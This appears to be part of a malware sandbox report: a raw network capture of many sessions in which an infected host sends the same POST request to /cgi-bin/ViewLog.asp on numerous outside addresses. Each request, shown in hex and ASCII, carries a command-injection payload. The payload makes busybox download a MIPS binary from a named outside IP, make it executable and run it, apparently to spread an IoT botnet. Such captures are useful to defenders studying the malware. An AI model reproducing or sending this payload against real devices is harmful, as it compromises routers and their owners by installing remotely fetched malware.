                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.006000996 CET84INHTTP/1.1 404 Can't find file


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              330192.168.2.143752285.193.229.148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:46.198728085 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              331192.168.2.145212495.169.0.2238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.611057043 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.767436981 CET167INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:16:48 GMT
                                              Content-Length: 0
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              332192.168.2.143882294.120.4.198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.678158045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              333192.168.2.144862094.120.228.548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.678481102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              334192.168.2.144088062.29.44.638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.680111885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              335192.168.2.143566462.29.86.318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.722978115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              336192.168.2.145270485.14.68.1878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.878194094 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              337192.168.2.144171095.79.121.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:48.893042088 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              338192.168.2.143908694.130.140.698080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.671158075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.788558960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.974345922 CET348INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:16:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              339192.168.2.145394885.73.125.1738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.685614109 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              340192.168.2.144262494.123.244.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.697380066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              341192.168.2.143432831.136.232.368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:51.089989901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:51.684571028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.836484909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.300345898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:59.908147097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.123749971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.298990965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.161477089 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              342192.168.2.145932485.208.22.388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:51.094758034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              343192.168.2.145825462.44.138.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:51.881315947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.044395924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:01.188101053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:13.219584942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
